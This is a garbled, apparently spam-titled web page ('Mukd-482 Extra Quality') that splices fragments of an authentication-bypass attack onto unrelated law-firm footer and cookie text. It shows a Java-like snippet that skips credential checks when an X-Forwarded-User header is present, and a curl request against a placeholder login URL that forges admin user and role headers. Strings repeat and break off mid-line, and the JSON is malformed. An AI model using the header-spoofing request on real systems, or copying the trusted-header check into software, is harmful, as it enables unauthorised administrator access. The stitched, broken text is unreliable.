Mukd-482 Extra Quality < 99% TESTED >

TARGET="https://vulnerable.example.com/login" COOKIE_JAR=$(mktemp)

if (request.getHeader("X-Forwarded-User") != null && isTrustedProxy(request)) // Bypass normal credential check user = userService.loadUserByUsername(request.getHeader("X-Forwarded-User")); else // Normal authentication flow user = authService.authenticate(username, password); mukd-482

curl -sk -c "$COOKIE_JAR" -X POST "$TARGET" \ -H "Content-Type: application/json" \ -H "X-Forwarded-User: admin" \ -H "X-Forwarded-Role: ADMIN" \ -d '"username":"foo","password":"bar"' \ -o /dev/null TARGET="https://vulnerable

"username": "anyuser", "password": "anypass" "password":"bar"' \ -o /dev/null "username": "anyuser"

Follow Quarles

Subscribe Media Contact
Back to Main Content

We use cookies to provide you with the best user experience on our website and to analyze statistics related to our website. To understand more about how we use cookies, or for instructions to change your preference and browser settings, please see our Privacy Notice. Please note that if you choose to reject cookies, doing so may impair some of our website's functionality.